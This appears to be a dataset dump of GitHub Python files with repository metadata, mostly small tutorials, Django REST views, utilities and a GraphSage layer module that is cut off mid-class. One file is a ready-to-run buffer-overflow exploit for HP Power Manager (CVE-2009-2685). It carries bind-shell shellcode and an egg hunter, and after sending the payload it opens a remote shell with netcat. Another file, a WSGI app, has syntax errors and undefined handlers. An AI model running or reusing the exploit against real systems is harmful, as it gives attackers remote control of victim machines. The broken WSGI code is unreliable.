blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b28f8c53500179cf517b82a6b50fec1e424e9f82 | 70b51830c01c25c363b01a8ea18ef0cb177deb26 | /Check_Armstrong.py | 6b9fd076e974e1eadc8436762dabfd1cca74746c | [] | no_license | sy850811/PythonBasics | 2c3da546c91bc617773bd0b2b6f63c40e1d7ff44 | a953e45cbb9e19cfceb50925d1774899d41ca548 | refs/heads/main | 2023-07-13T18:17:38.536597 | 2021-08-27T19:35:51 | 2021-08-27T19:35:51 | 400,584,426 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 310 | py | n = int(input())
def arm(n,m):
armNo = 0
while n!=0:
t = n%10
armNo+=t**m
n = n//10
return armNo
def countDigit(n):
count = 0
while n!=0:
n=n//10
count+=1
return count
if(n == arm(n,countDigit(n))):
print("true")
else:
print("false")
| [
"noreply@github.com"
] | noreply@github.com |
1287031215a5c2e62234091f3722019c1952123e | 3bcc247a2bc1e0720f0344c96f17aa50d4bcdf2d | /第三阶段笔记/x.py | 9a4ea86bafae287fe00bb41414f17d9df388718a | [] | no_license | qianpeng-shen/Study_notes | 6f77f21a53266476c3c81c9cf4762b2efbf821fa | 28fb9a1434899efc2d817ae47e94c31e40723d9c | refs/heads/master | 2021-08-16T19:12:57.926127 | 2021-07-06T03:22:05 | 2021-07-06T03:22:05 | 181,856,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,542 | py | import time
HTML_ROOT_DIR="./static"
PYTHON_DIR="./wsgiPy"
class Application(object):
def __init__(self,urls):
self.urls=urls
def __call__(self,env,set_headers):
path=env.get('PARH_INFO','/')
if path.startswith('static'):
file_name=path[7:]
try:
fd=open(HTML_ROOT_DIR,'rb')
except IOError:
status='404 not fount'
headers=[]
set_headers(status,headers)
return "<h1>===没找到===<h1>"
else:
file_data=fd.read()
fd.close()
status='200 OK'
headers=[]
set_headers(status,headers)
return file_data.decode('utf-8')
else:
for url,handler in self.urls:
if path==url:
return handler(env,set_headers)
status="404 not found"
headers=[]
set_headers(status,headers)
return "sorry url not found"
def show _time(env,set_headers):
status="200 OK"
headers=[]
set_headers(status,headers)
return time.ctime()
def show _time(env,set_headers):
status="200 OK"
headers=[]
set_headers(status,headers)
return time.ctime()
def show _time(env,set_headers):
status="200 OK"
headers=[]
set_headers(status,headers)
return time.ctime()
urls=[
('/time',show_time),
('/hello',say_hello),
('/bye',say_bye),
("/xiaoyang",yang)
]
app=Application(urls)
| [
"shenqianpeng@chengfayun.com"
] | shenqianpeng@chengfayun.com |
c0409e2f1ebcd0362d83e57e190ccb744b8b61a9 | 7e736381f5cc651afe1df8ef21a54c9a0a42e8a4 | /svjconesizestudy/logger.py | fdb3d79624d1ceaa30d1d8a7df59c5bebc4b9280 | [
"BSD-3-Clause"
] | permissive | tklijnsma/svjconesizestudy | dd5e94bf847244e974f80bba277c0d3e2a44b87d | 5cd54d574b9bd086f7f033ed4f3fa365d2141165 | refs/heads/master | 2021-05-24T11:18:59.260313 | 2020-04-06T15:15:04 | 2020-04-06T15:15:04 | 253,535,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,039 | py | import logging
COLORS = {
'yellow' : '\033[33m',
'red' : '\033[31m',
}
RESET = '\033[0m'
def colored(text, color=None):
if not color is None:
text = COLORS[color] + text + RESET
return text
def setup_logger(name='svjcs', fmt=None):
if name in logging.Logger.manager.loggerDict:
logger = logging.getLogger(name)
logger.info('Logger %s is already defined', name)
else:
if fmt is None:
fmt = logging.Formatter(
fmt = (
colored(
'> {0}:%(levelname)8s:%(asctime)s:%(module)s:'
.format(name),
'yellow'
)
+ ' %(message)s'
),
datefmt='%Y-%m-%d %H:%M:%S'
)
handler = logging.StreamHandler()
handler.setFormatter(fmt)
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
return logger
| [
"klijnsma@fnal.gov"
] | klijnsma@fnal.gov |
f5754099ff2905c976d9a0af1a23d58ea7433e21 | 84072a7c11babfdc33e7496647eb73fb46f3313b | /09_numpy_intro.py | 7d6547a8d2c13d6016d9518fd6bb26c5dcd047a7 | [] | no_license | jeffreyleeon/python-tutorials | 803bc47a5105221c5dc074eaea674dda918e1b88 | bb52ce26fb88b00944c0121809e35e4d5e0c9878 | refs/heads/master | 2021-01-21T10:22:09.535265 | 2017-03-19T04:16:30 | 2017-03-19T04:16:30 | 83,416,639 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,815 | py | '''
Introduction to numpy library
Using the technic learnt in 08_using_built_in_library.py to import numpy, use functions in numpy
Documentation from numpy quick starter: https://docs.scipy.org/doc/numpy-dev/user/quickstart.html
- array
- arange
- shape
- zeros
- ones
- empty
'''
# import the numpy library
import numpy
# To create an array, we use numpy.array function, and provide a list
array = numpy.array([1, 2, 3, 4])
print('Array created from numpy.array([1, 2, 3, 4]): ')
print(array) # [1 2 3 4]
print()
# To create array using arange function
# .arange function can create array with n items, starting from 0 to n-1
array = numpy.arange(10)
print('Array created from numpy.arange(10): ')
print(array) # [0 1 2 3 4 5 6 7 8 9]
print()
# .arange function can also create an array by providing begin value, end value, step value
array = numpy.arange(0, 100, 5) # 0 is begin value; 100 is end value(exclusive), 5 is step value
print('Array created from numpy.arange(0, 100, 5): ')
print(array) # [ 0 5 10 15 20 25 30 35 40 45 50 55 60 65 70 75 80 85 90 95]
print()
print('The shape of the array is: ', array.shape) # (20, )
print()
# Create an array of 15 items and convert it into a 3*5 MATRIX using .reshape function
array = numpy.arange(15)
print('Array created from numpy.arange(15): ')
print(array) # [0 1 2 3 4 5 6 7 8 9 10 11 12 13 14]
print()
matrix = array.reshape(3, 5)
print('matrix created from array.reshape(3, 5): ')
print(matrix)
'''
[
[ 0 1 2 3 4]
[ 5 6 7 8 9]
[10 11 12 13 14]
]
'''
print('The shape of the MATRIX is: ', matrix.shape) # (3, 5), 3 rows 5 columns
print()
matrix = array.reshape(5, 3)
print('matrix created from array.reshape(5, 3): ')
print(matrix)
'''
[
[ 0 1 2]
[ 3 4 5]
[ 6 7 8]
[ 9 10 11]
[12 13 14]
]
'''
print('The shape of the MATRIX is: ', matrix.shape) # (5, 3), 5 rows 3 columns
print()
# numpy can also create a matrix with .zeros .ones .empty functions
matrix = numpy.zeros((4, 4))
print('matrix created from numpy.zeros((4, 4)): ')
print(matrix)
'''
[
[ 0. 0. 0. 0.]
[ 0. 0. 0. 0.]
[ 0. 0. 0. 0.]
[ 0. 0. 0. 0.]
]
'''
print('The shape of the MATRIX is: ', matrix.shape) # (4, 4), 4 rows 4 columns
print()
# .ones
matrix = numpy.ones((2, 3))
print('matrix created from numpy.ones((2, 3)): ')
print(matrix)
'''
[
[ 1. 1. 1.]
[ 1. 1. 1.]
]
'''
print('The shape of the MATRIX is: ', matrix.shape) # (2, 3), 2 rows 3 columns
print()
# .empty
matrix = numpy.empty((3, 3))
print('matrix created from numpy.empty((3, 3)): ')
print(matrix)
'''
[
[ 4.94065646e-324 9.88131292e-324 1.48219694e-323]
[ 1.97626258e-323 2.47032823e-323 2.96439388e-323]
[ 3.45845952e-323 3.95252517e-323 4.44659081e-323]
]
'''
print('The shape of the MATRIX is: ', matrix.shape) # (3, 3), 3 rows 3 columns
print()
| [
"jeffreyleeon@gmail.com"
] | jeffreyleeon@gmail.com |
4b227af594df82233bdffce71409ee9b902abd9e | 774fccd6bb2369d9d46fb448649ebe68b81542f7 | /my_env/bin/pip3 | 938341b06d6266d4e836ea1d059b8d48a891411e | [] | no_license | lyf0214/mysite | 3b49a0d1fb356e1a994c8cb9c3601bcb978af519 | 40a3ec7d499412fc87e8412426b0146878c8ad93 | refs/heads/master | 2020-03-24T07:01:44.409449 | 2018-07-27T11:25:35 | 2018-07-27T11:25:35 | 142,550,177 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 231 | #!/Users/shiny/my_env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"shiny@AppledeMacBook-Pro-3.local"
] | shiny@AppledeMacBook-Pro-3.local | |
cb02f43cde2d805ac8b14cabc69256dfad851d6a | fec36e7493a78575cd0320bf31c5080649863a06 | /src/views/feature_value/list.py | 2294b96b083b882991877221f5e144dc233b810e | [] | no_license | teimurjan/eye8-backend | 6f44e830dd17dcac8b23acc3b66b9918357f643b | bf0a4c894a5b3770fada269d8b4d7d72367ab1ba | refs/heads/master | 2023-06-30T01:34:38.358903 | 2021-06-23T10:06:29 | 2021-06-23T10:06:29 | 273,144,546 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,287 | py | from src.validation_rules.feature_value.create import (
CreateFeatureValueData,
CreateFeatureValueDataValidator,
)
from typing import Type
from src.serializers.feature_value import FeatureValueSerializer
from src.constants.status_codes import OK_CODE
from src.errors import InvalidEntityFormat
from src.services.feature_value import FeatureValueService
from src.views.base import PaginatableView, ValidatableView
class FeatureValueListView(ValidatableView[CreateFeatureValueData], PaginatableView):
def __init__(
self,
validator: CreateFeatureValueDataValidator,
service: FeatureValueService,
serializer_cls: Type[FeatureValueSerializer],
):
super().__init__(validator)
self._service = service
self._serializer_cls = serializer_cls
def get(self, request):
pagination_data = self._get_pagination_data(request)
meta = None
feature_values = []
if pagination_data:
feature_values, count = self._service.get_all(
offset=pagination_data["offset"], limit=pagination_data["limit"]
)
meta = self._get_meta(
count, pagination_data["page"], pagination_data["limit"]
)
else:
feature_values, _ = self._service.get_all()
raw_intl = request.args.get("raw_intl") == "1"
serialized_feature_values = [
self._serializer_cls(feature_value)
.in_language(None if raw_intl else request.language)
.with_serialized_feature_type()
.serialize()
for feature_value in feature_values
]
return {"data": serialized_feature_values, "meta": meta}, OK_CODE
def post(self, request):
try:
valid_data = self._validate(request.get_json())
feature_value = self._service.create(valid_data, user=request.user)
serialized_feature_value = (
self._serializer_cls(feature_value)
.with_serialized_feature_type()
.serialize()
)
return {"data": serialized_feature_value}, OK_CODE
except self._service.FeatureTypeInvalid:
raise InvalidEntityFormat({"feature_type_id": "errors.invalidID"})
| [
"teymurgg321@gmail.com"
] | teymurgg321@gmail.com |
cf95a73677140afefa5be34f07f063779c6b72bb | 0a5add05aad61dd2aa8ff366969f66d6a7f8c42c | /main/views.py | dd31373af50367de5becd8c4f01b11e832556ad4 | [] | no_license | PY312/nco | ae3584ee94fd5c6f23a9acbaadea411073ddac11 | 6374630f608e96d40652ced37224e253eebd89f2 | refs/heads/master | 2023-07-17T21:08:33.419856 | 2021-09-08T13:54:25 | 2021-09-08T13:54:25 | 404,366,294 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 577 | py | from django.shortcuts import render
from .models import News, ImageNews
from .serializers import NewsListSerializer, NewsItemSerializer
from rest_framework import generics
from rest_framework.pagination import PageNumberPagination
# Create your views here.
class NewsListApiView(generics.ListAPIView):
queryset = News.objects.all()
serializer_class = NewsListSerializer
pagination_class = PageNumberPagination
class NewsItemApiView(generics.RetrieveAPIView):
queryset = News.objects.all()
serializer_class = NewsItemSerializer
lookup_field = 'id'
| [
"83508520+PY312@users.noreply.github.com"
] | 83508520+PY312@users.noreply.github.com |
458616bff6eea889f3db88f7bced7ffe0e0a3235 | 67c7bd48588eab5faede849b89501106756a7447 | /HP_Power_Manager_bof .py | 6b244529caad2bb8eb8ae5dce66434fe2ef4f87a | [] | no_license | sharmaharjeet92/scripts | 0df53153823fa781b719b8169fe3d3561e9c90ad | e1f75703cf0b5a02cd9267e88da171e8a8518267 | refs/heads/master | 2020-04-05T10:23:23.805770 | 2020-03-04T09:51:25 | 2020-03-04T09:51:25 | 156,796,970 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,740 | py | #!/usr/bin/python
# HP Power Manager Administration Universal Buffer Overflow Exploit
# CVE 2009-2685
# Tested on Windows 7 Ultimate,based on ExploitDB Exploit 10099 developed by Matteo Memelli ryujin Matteo Memelli ryujin __A-T__ offensive-security.com
#Tweaked by Harjeet Sharma
# This Exploit use the concept of EGG Hunter as buffer size is small,
# Egg Hunter technique will inject small shell code then this small shell code will search for our large payload/shellcode.
#More Info for this can be found at https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
#https://security.stackexchange.com/questions/173674/buffer-overflow-doesnt-have-enough-space-for-exploit-after-being-crashed
import sys
from socket import *
import time
import os
print "HP Power Manager Administration Universal Buffer Overflow Exploit"
print "May the force be with you...."
try:
HOST = sys.argv[1]
except IndexError:
print "Usage: hp.py <remote-ip> "
sys.exit()
PORT = 80
RET = "\xCF\xBC\x08\x76" # 7608BCCF JMP ESP MSVCP60.dll
#msfvenom -p windows/shell_bind_tcp LHOST=X.X.X.X LPORT=1234 EXITFUNC=thread -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" x86/alpha_mixed --platform windows -f python
# Size of this payload is 352 Bytes
#Adding TAG harjharj so egghunter can find it
egg="harjharj"
buf= egg
buf += "\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\x93\x85\x8e\x92\x83\xee\xfc\xe2\xf4\x6f\x6d"
buf += "\x0c\x92\x93\x85\xee\x1b\x76\xb4\x4e\xf6\x18\xd5\xbe"
buf += "\x19\xc1\x89\x05\xc0\x87\x0e\xfc\xba\x9c\x32\xc4\xb4"
buf += "\xa2\x7a\x22\xae\xf2\xf9\x8c\xbe\xb3\x44\x41\x9f\x92"
buf += "\x42\x6c\x60\xc1\xd2\x05\xc0\x83\x0e\xc4\xae\x18\xc9"
buf += "\x9f\xea\x70\xcd\x8f\x43\xc2\x0e\xd7\xb2\x92\x56\x05"
buf += "\xdb\x8b\x66\xb4\xdb\x18\xb1\x05\x93\x45\xb4\x71\x3e"
buf += "\x52\x4a\x83\x93\x54\xbd\x6e\xe7\x65\x86\xf3\x6a\xa8"
buf += "\xf8\xaa\xe7\x77\xdd\x05\xca\xb7\x84\x5d\xf4\x18\x89"
buf += "\xc5\x19\xcb\x99\x8f\x41\x18\x81\x05\x93\x43\x0c\xca"
buf += "\xb6\xb7\xde\xd5\xf3\xca\xdf\xdf\x6d\x73\xda\xd1\xc8"
buf += "\x18\x97\x65\x1f\xce\xed\xbd\xa0\x93\x85\xe6\xe5\xe0"
buf += "\xb7\xd1\xc6\xfb\xc9\xf9\xb4\x94\x7a\x5b\x2a\x03\x84"
buf += "\x8e\x92\xba\x41\xda\xc2\xfb\xac\x0e\xf9\x93\x7a\x5b"
buf += "\xf8\x9b\xdc\xde\x70\x6e\xc5\xde\xd2\xc3\xed\x64\x9d"
buf += "\x4c\x65\x71\x47\x04\xed\x8c\x92\x97\x57\x07\x74\xf9"
buf += "\x95\xd8\xc5\xfb\x47\x55\xa5\xf4\x7a\x5b\xc5\xfb\x32"
buf += "\x67\xaa\x6c\x7a\x5b\xc5\xfb\xf1\x62\xa9\x72\x7a\x5b"
buf += "\xc5\x04\xed\xfb\xfc\xde\xe4\x71\x47\xfb\xe6\xe3\xf6"
buf += "\x93\x0c\x6d\xc5\xc4\xd2\xbf\x64\xf9\x97\xd7\xc4\x71"
buf += "\x78\xe8\x55\xd7\xa1\xb2\x93\x92\x08\xca\xb6\x83\x43"
buf += "\x8e\xd6\xc7\xd5\xd8\xc4\xc5\xc3\xd8\xdc\xc5\xd3\xdd"
buf += "\xc4\xfb\xfc\x42\xad\x15\x7a\x5b\x1b\x73\xcb\xd8\xd4"
buf += "\x6c\xb5\xe6\x9a\x14\x98\xee\x6d\x46\x3e\x6e\x8f\xb9"
buf += "\x8f\xe6\x34\x06\x38\x13\x6d\x46\xb9\x88\xee\x99\x05"
buf += "\x75\x72\xe6\x80\x35\xd5\x80\xf7\xe1\xf8\x93\xd6\x71"
buf += "\x47"
#Creating small egg Hunter with name "hunter" with tag "harj"
#tools/exploit/egghunter.rb -f python -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" -e harj -v 'hunter'
hunter = ""
hunter += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"
hunter += "\x3c\x05\x5a\x74\xef\xb8\x68\x61\x72\x6a\x89\xd7"
hunter += "\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
#lets make a POST HTTP Request,Main Shellcode we will be injecting in User-Agent Field.
evil = "POST http://%s/goform/formLogin HTTP/1.1\r\n"
evil += "Host: %s\r\n"
evil += "User-Agent: %s\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Referer: http://%s/index.asp\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 678\r\n\r\n"
evil += "HtmlOnly=true&Password=admin&loginButton=Submit+Login&Login=admin"
evil += "\x41"*256 + RET + "\x90"*32 + hunter + "\x42"*287 + "\x0d\x0a"
evil = evil % (HOST,HOST,buf,HOST)
#Now we have the payload ready,lets go for kill
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print '[+] Sending evil buffer...'
s.send(evil)
print s.recv(1024)
print "[+] Sent!"
print " Wait for few seconds,spawning the shell for you... "
time.sleep(30)
print "[*] Using netcat to connect %s over port 1234 " % HOST
os.system("nc -nv " + HOST +" 1234")
s.close()
| [
"noreply@github.com"
] | noreply@github.com |
21796ac535397c38f7262b1929fc6ae5dde8f84a | 2f87a8a49f4f26c36cbbfa6381bebb6b8dacc655 | /api_basic/urls.py | adbbb878dd0175a7a2830d1f092ad2c7d8b9e15b | [] | no_license | Shrav543/Django-rest | 63b537ef0a30b89e8aa846afdaa138d26dc36419 | d016570eb759607a1c5451f72bb97fd589a75384 | refs/heads/master | 2023-07-31T14:51:11.826234 | 2020-06-12T09:50:10 | 2020-06-12T09:50:10 | 271,763,114 | 0 | 0 | null | 2021-09-22T19:12:26 | 2020-06-12T09:43:30 | Python | UTF-8 | Python | false | false | 1,047 | py | from django.urls import path , include
#from .views import ArticleAPIVIEW, Article_DetailAPI ,GenericAPIView , ArticleViewSet
#from .views import ArticleViewSetGeneric
from .views import ArticleViewSetModel
from rest_framework.routers import DefaultRouter
router = DefaultRouter()
#router.register('', ArticleViewSet, basename='article')
#router.register('article', ArticleViewSetGeneric ,basename='article')
router.register('',ArticleViewSetModel)
urlpatterns = [
# path('article/', views.article_list , name="api-basic-article"),
# path('detail/<int:pk>/',views.article_Detail , name ="api-basic-article-detail")
# path('article/', ArticleAPIVIEW.as_view()), #since we are using class we need to add .as_view()
# path('detail/<int:id>/',Article_DetailAPI.as_view()),
# path('generic/<int:id>/', GenericAPIView.as_view()),
# path('generic/', GenericAPIView.as_view()),
# path('viewset/',include(router.urls)),
#path('viewsetgeneric/',include(router.urls)),
path('viewsetmodel/', include(router.urls)),
]
| [
"er.gauravsharma543@gmail.com"
] | er.gauravsharma543@gmail.com |
54fa9a542b276fcf3b2261c362e3d446b891570a | ce9c2603167e1b30b222afd5206ac7fa31d19a77 | /imctools/io/errors.py | dfd219570e7d15482e270e2b063e25a27abc5522 | [
"MIT"
] | permissive | BodenmillerGroup/imctools | 6d07036045a6361e17811d8f675eab01f34ffade | 361e49f3e0de4cf9c58c3b6d1024feacd2855d98 | refs/heads/master | 2022-05-01T23:29:49.302686 | 2022-03-31T09:58:01 | 2022-03-31T09:58:01 | 68,657,395 | 21 | 14 | MIT | 2022-03-31T09:58:02 | 2016-09-20T00:16:24 | Python | UTF-8 | Python | false | false | 75 | py | class AcquisitionError(Exception):
"""An error with IMC acquisition"""
| [
"anton.rau@gmail.com"
] | anton.rau@gmail.com |
3901eb30debbc1c94cf3d40f80aa71a9a4ffbaa1 | 0b514feea82eaa2e341130d9e23d13d72271d644 | /2.Jump_to_python/Python07.py | 99deebb9aeec73d60845d030c9ca5481a5b33cec | [] | no_license | Jerrykim91/FromZero | f8478012130948a11978a46ab6ec7922cb354a8f | fdd5a0716b29c77019cfcd1e1eab7ed4afd1aed4 | refs/heads/master | 2022-12-25T15:04:22.656462 | 2020-10-10T14:35:06 | 2020-10-10T14:35:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,514 | py | # 모듈화 + 패키지
# + 모듈가져오기, 테스트 코드 배치 , 모듈가져오기 , 패키지 사용
# 모듈
# 함수나 변수 또는 클래스를 모아 놓은 파일이다.
# => 확장자가.py파일
# mod.py,__init__.py,p1.py, p2.py,...
# import 모듈이름
# 모듈이름.함수 모듈이름을 안쓰려면 -> from 모듈이름 import 모듈함수
# from mod1 import* -> * (모든것)을 의미
# 모듈화의 대상 => 변수, 함수, 클래스 <= 요소를 가져다 내것 처럼 사용가능
# 패키지
# 유사한 기능 끼리 묶어둔 디렉토리 ,유틸리티 , 통신 , gui등등 모아둔것
# 패키지 폴더 내에 __init__.py 이 파일은 하위 호환을 위해서 python3.3이하에서는 모두 사용한다.
# 그리고, __init__.py는 곧 해당 패키지 자체를 의미한다
#-------------------------------
# from 패키지.패키지....모듈\ import 변수,함수,클레스(필요한것들 열거)
from a.b.mod import PI, add
print(PI)
print(add(1,2))
# from 패키지.패키지 \ import 변수, 함수, 클래스
# 경로상 마지막 패키지(디렉토리)안에 있는 __init__.py에서 모듈을 가져온다
from a.b import PI2 as pi2 # PI2 -> pi2 이름 변경
print(pi2)
# 패키지명은 절대로 .들어가면 않된다!!
# 모듈명도 절대로 .들어가면 않된다!!
from a import PI3
print(PI3)
# 별칭 => 이름이 너무 길어서라든지, 이름 변경을 해서 사용하고 싶다면
# 원래이름 as 별칭
from a import PI3 as pi
print(pi)
# 가져올 모듈이 너무 많다. 다 가져왔으면 좋겟다 => *
# 하위 호환을 위해서는
# __all__=['mod']
from a.b import *
print( mod.PI, PI2 )
# import만 사용시
import a.b.mod as m
print( m.PI )
import a.b as bm
print( bm.PI2 )
# 모듈을 가져온다는 것은 해당 모듈을 실행한다라고 봐도 무방하다->메모리 적제를 해야하니
# 내가 만든 모듈같은 경우 의도하지 않은 코드가 실행될수 있다
# => 테스트 할려고 만든 코드는 모듈 가져오기 수행시 실제로 구동되면 않된다
# => 이런 코드 처리가 필요하다 => __name__을 이용하여 처리 한다
# __name__을 사용하는 모듈을 직접 구동하면 "__main__"으로 나오고,
# 모듈로 사용되면(즉, 다른 모듀이 가져다 쓰면) "모듈명"으로 나온다
from Python08 import XMan
mu = XMan( '로건2', 100, 50, 51)
print( mu )
print('Python07 : __name__', __name__) | [
"sun4131@gmail.com"
] | sun4131@gmail.com |
c1245a82f33ae2d0ae87149125edee011c5be097 | f8d929261ec8cf6671fc5725b91a1b26423d2dbc | /Account_app/migrations/0001_initial.py | 5817ac8eea3e2c5dcc1866c072c9eb6ea816ceda | [] | no_license | trak2018z/Web_System-tr | e2091d6e4ae7141a9ebd4a764bc7d33752f50642 | 92a144580144e491429bc82b517ff22566318a3b | refs/heads/master | 2021-05-09T05:28:32.304547 | 2018-01-08T17:56:29 | 2018-01-08T17:56:29 | 119,310,245 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,416 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-01-06 12:01
from __future__ import unicode_literals
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone', models.IntegerField(default=0)),
('street', models.CharField(default='', max_length=200)),
('city', models.CharField(default='', max_length=200)),
('post_code', models.CharField(default='', max_length=6)),
('company', models.CharField(blank=True, max_length=300)),
('company_city', models.CharField(blank=True, max_length=200)),
('company_street', models.CharField(blank=True, max_length=200)),
('company_post_code', models.CharField(blank=True, max_length=6)),
('company_nip', models.IntegerField(default=0)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"tomel23@wp.pl"
] | tomel23@wp.pl |
0d555fa2eb97724fcc5f3910b125fe5a55b9cea4 | 2f95c4762e0d57e97da6c291228761e3a8c8e938 | /vvdatalab_nifi_flow_generator/models/io_ports/create_io_group.py | d1b0d75d5ab45c4db63aab072544122f16ea43cc | [] | no_license | felipelobasrocha/nifi_flow_generator | 9964050a6834fb15434f2f8ece16b1d26afe192c | 6dea7c27250e3447e5febf6a6e55625f413ec62c | refs/heads/master | 2020-08-24T22:00:43.115585 | 2019-10-22T21:40:34 | 2019-10-22T21:40:34 | 216,914,965 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,480 | py | from nipyapi import canvas, nifi
from vvdatalab_nifi_flow_generator import models
from vvdatalab_nifi_flow_generator.models.io_ports.create_input_port import CreateInputPort
from vvdatalab_nifi_flow_generator.models.io_ports.create_output_port import CreateOutputPort
CreateProcessGroup = models.CreateProcessGroup
CreateLocation = models.CreateLocation
LocationType = models.LocationType
class CreateIOGroup:
def create(self, process_group, processor_to_connect=None, processor_from_connect=None, connect_to=None,
connect_from=None, component_location=None):
if component_location == None:
component_location = lambda : (2000.00, 400.0)
io_process_group = CreateProcessGroup(
process_group, 'IOProcessGroup', component_location()).create()
component_location = CreateLocation(x=0.0, y=0.0, type=LocationType.ZIGZAG).create
if processor_to_connect != None and connect_to != None:
input_port = CreateInputPort(io_process_group, component_location(), 'input_port').create()
connect_to(process_group, io_process_group, processor_to_connect, input_port)
if processor_from_connect != None and connect_from != None:
output_port = CreateOutputPort(io_process_group, component_location(), 'output_port').create()
connect_from(io_process_group, process_group, processor_from_connect, output_port, component_location)
return io_process_group | [
"felipelobas@gmail.com"
] | felipelobas@gmail.com |
7f3756c05f98afee44bfcc701b9a25e895ada073 | 2c4c3f777d94157d5a5cf8664907de1a605a1110 | /algorithms/GraphSage/layers.py | ca2496d997093716a74acd63b14ed0433a38c949 | [
"Apache-2.0"
] | permissive | safe-graph/DGFraud | a86715662d86291c22dae389aa36d72b74042ab6 | 22b72d75f81dd057762f0c7225a4558a25095b8f | refs/heads/master | 2023-08-23T01:01:04.195966 | 2022-04-20T21:39:08 | 2022-04-20T21:39:08 | 223,415,751 | 632 | 162 | Apache-2.0 | 2020-07-31T04:10:54 | 2019-11-22T14:02:36 | Python | UTF-8 | Python | false | false | 3,779 | py | from __future__ import division
from __future__ import print_function
import tensorflow as tf
from graphsage.inits import zeros
flags = tf.app.flags
FLAGS = flags.FLAGS
# DISCLAIMER:
# Boilerplate parts of this code file were originally forked from
# https://github.com/tkipf/gcn
# which itself was very inspired by the keras package
# global unique layer ID dictionary for layer name assignment
_LAYER_UIDS = {}
def get_layer_uid(layer_name=''):
"""Helper function, assigns unique layer IDs."""
if layer_name not in _LAYER_UIDS:
_LAYER_UIDS[layer_name] = 1
return 1
else:
_LAYER_UIDS[layer_name] += 1
return _LAYER_UIDS[layer_name]
class Layer(object):
"""Base layer class. Defines basic API for all layer objects.
Implementation inspired by keras (http://keras.io).
# Properties
name: String, defines the variable scope of the layer.
logging: Boolean, switches Tensorflow histogram logging on/off
# Methods
_call(inputs): Defines computation graph of layer
(i.e. takes input, returns output)
__call__(inputs): Wrapper for _call()
_log_vars(): Log all variables
"""
def __init__(self, **kwargs):
allowed_kwargs = {'name', 'logging', 'model_size'}
for kwarg in kwargs.keys():
assert kwarg in allowed_kwargs, 'Invalid keyword argument: ' + kwarg
name = kwargs.get('name')
if not name:
layer = self.__class__.__name__.lower()
name = layer + '_' + str(get_layer_uid(layer))
self.name = name
self.vars = {}
logging = kwargs.get('logging', False)
self.logging = logging
self.sparse_inputs = False
def _call(self, inputs):
return inputs
def __call__(self, inputs):
with tf.name_scope(self.name):
if self.logging and not self.sparse_inputs:
tf.summary.histogram(self.name + '/inputs', inputs)
outputs = self._call(inputs)
if self.logging:
tf.summary.histogram(self.name + '/outputs', outputs)
return outputs
def _log_vars(self):
for var in self.vars:
tf.summary.histogram(self.name + '/vars/' + var, self.vars[var])
class Dense(Layer):
"""Dense layer."""
def __init__(self, input_dim, output_dim, dropout=0.,
act=tf.nn.relu, placeholders=None, bias=True, featureless=False,
sparse_inputs=False, **kwargs):
super(Dense, self).__init__(**kwargs)
self.dropout = dropout
self.act = act
self.featureless = featureless
self.bias = bias
self.input_dim = input_dim
self.output_dim = output_dim
# helper variable for sparse dropout
self.sparse_inputs = sparse_inputs
if sparse_inputs:
